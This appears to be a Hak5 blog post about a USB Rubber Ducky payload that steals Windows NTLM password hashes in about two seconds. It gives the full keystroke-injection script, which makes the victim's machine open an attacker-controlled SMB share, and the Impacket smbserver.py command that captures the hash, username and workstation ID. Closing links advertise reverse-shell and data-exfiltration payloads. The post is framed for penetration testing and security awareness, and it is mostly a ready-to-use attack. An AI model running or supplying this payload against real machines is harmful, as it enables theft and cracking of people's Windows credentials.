What's the quickest way to steal a Windows password hash?

Using a USB Rubber Ducky and this simple payload, Windows password hashes can be captured for cracking in less than two seconds.

This technique works against almost all versions of Microsoft Windows and only requires a 5 line Ducky Script and an open source server setup on the target network.

Killer Effort:Reward Ratio

This is actually one of my favorite USB Rubber Ducky payloads for policy compliance and information security awareness. It leverages built in functionality of the Microsoft Windows operating system, requires next to nothing in terms of privileges, and executes faster than a user could reasonably thwart the attack by unplugging the seemingly benign "USB Thumbdrive". 

The intel gained from this extremely quick attack is also of great value to any penetration tester or internal red team. Timestamp, workstation ID, user and even NTLM hash. What's not to love?

What you'll need

The Ducky Script

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Hak5Darren
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

That's literally it. Just replace hostname with the hostname or IP address of your listening server running Impacket's smbserver.py

The Server

This USB Rubber Ducky payload attempts to access an SMB share on the network - \\hostname. When Windows attempts to open this share, part of the process is passing its NTLM network hash, along with its hostname (workstation ID) and username. Of course you'll also get the timestamp. What more could one ask for?

Rather than using an actual SMB server - we'll want to use Impacket's smbserver.py since it'll allow us to easily capture all of this information. The basic usage is to supply a share name and point it at a directly. This can be anything really - from tmp /tmp/ to "YOU'VE BROKEN COMPANY USB POLICY. IT WILL CONTACT YOU SOON" /stuff/

impacket/examples/smbserver.py tmp /tmp/

Have fun with that one.

Now of course this payload will work best when you have the listening smb server on the target LAN, as most good firewalls will prevent SMB access over the Internet. At least - they should... ;-)



Also in USB Rubber Ducky

What is the best security awareness payload for the Rubber Ducky?
What is the best security awareness payload for the Rubber Ducky?

A two second HID attack against Windows and Mac that launches the website of your choosing. That's by far the most effective security awareness payload for the USB Rubber Ducky.

The 3 Second Reverse Shell with a USB Rubber Ducky
The 3 Second Reverse Shell with a USB Rubber Ducky

A reverse shell is a type of shell where the victim computer calls back to an attacker’s computer. The attacking computer typically listens on a specific port. When it receives the connection it is then able to execute commands on the victim computer. In essence it’s remote control of a computer.
15 Second Password Hack, Mr Robot Style
15 Second Password Hack, Mr Robot Style

In honor of the USB Rubber Ducky appearance on a recent episode of Mr Robot, we’re recreating this hollywood hack and showing how easy it is to deploy malware and exfiltrate data using this Hak5 tool.

Sign up for sales, new releases, payloads and more…

Sign up today